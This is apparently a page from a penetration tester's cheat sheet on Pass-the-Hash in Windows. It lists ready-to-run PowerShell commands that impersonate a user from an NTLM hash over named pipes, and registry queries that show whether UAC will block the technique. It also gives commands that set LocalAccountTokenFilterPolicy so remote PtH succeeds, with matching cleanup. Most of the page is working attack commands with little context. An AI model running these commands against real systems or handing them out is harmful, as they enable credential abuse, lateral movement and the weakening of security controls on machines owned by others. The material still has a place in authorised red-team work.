TwitterGitHubBlogSponsor

Pass-the-Hash

NamedPipePTH

Impersonate a user with Pass-the-Hash for local actions (network authentication does not work with Impersonation Token, only with Delegation Token):

PS > Invoke-ImpersonateUser-PTH -Username snovvcrash -Hash fc525c9683e8fe067095ba2ddc971889 -Target localhost -Domain . -PipeName mypipe -Binary C:\Windows\System32\cmd.exe -Verbose
PS > Invoke-SharpNamedPipePTH -C "username:snovvcrash domain:{megacorp.local|localhost} hash:fc525c9683e8fe067095ba2ddc971889 binary:C:\Windows\System32\cmd.exe"

Can be used for authenticating in SQL Server management tools (%PROGRAMFILES(X86)%\Microsoft SQL Server Management Studio 18\Common7\IDE\Ssms.exe) and accessing DBs with SQL admin hash, for example.

PtH Notes

User Account Control

LocalAccountTokenFilterPolicy & FilterAdministratorToken

If LocalAccountTokenFilterPolicy exists and is set to 1 (doesn't exist by default), remote connections from all local admins are not affected by UAC and PtH will succeed:

PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name LocalAccountTokenFilterPolicy

If FilterAdministratorToken exists and is set to 1 (doesn't exist by default), builtin local admin account (RID 500) is affected by UAC and PtH will fail:

PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name FilterAdministratorToken

Add:

Cmd > reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
PS > New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -PropertyType "DWORD" -Value 1 -Force

Cleanup:

Cmd > reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /f
PS > Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -Force

Last updated